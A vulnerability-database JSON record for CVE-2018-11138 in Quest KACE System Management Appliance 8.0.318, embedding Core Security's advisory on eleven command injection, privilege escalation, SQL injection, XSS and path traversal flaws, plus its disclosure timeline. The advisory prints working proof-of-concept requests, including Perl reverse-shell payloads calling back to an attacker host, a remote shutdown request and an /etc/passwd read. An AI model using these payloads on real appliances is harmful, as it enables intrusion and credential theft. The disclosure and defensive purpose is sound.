{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0598",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kace system management appliance",
        "scope": "eq",
        "trust": 2.2,
        "vendor": "quest",
        "version": "8.0.318"
      },
      {
        "model": "kace systems management appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "quest",
        "version": "8.0.318"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Core Security Technologies, Leandro Barragan, Guido Leo",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148005"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2018-11138",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2018-11138",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2018-10907",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-11138",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-11138",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-10907",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201805-1216",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-11138",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-10907"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-11138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005411"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-11138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-1216"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system. Quest KACE Systems Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance provides comprehensive system management for all network connected devices. A command injection vulnerability exists in the \u0027/common/download_agent_installer.php\u0027 script in QuestKACESystemManagementAppliance8.0.318. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1]  provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x   2 www   wheel   512B Feb  9 20:40 . \ndrwxr-xr-x  23 root  wheel   512B Nov 14 18:29 .. \n-rw-r--r--   1 www   wheel    11B Feb  9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). 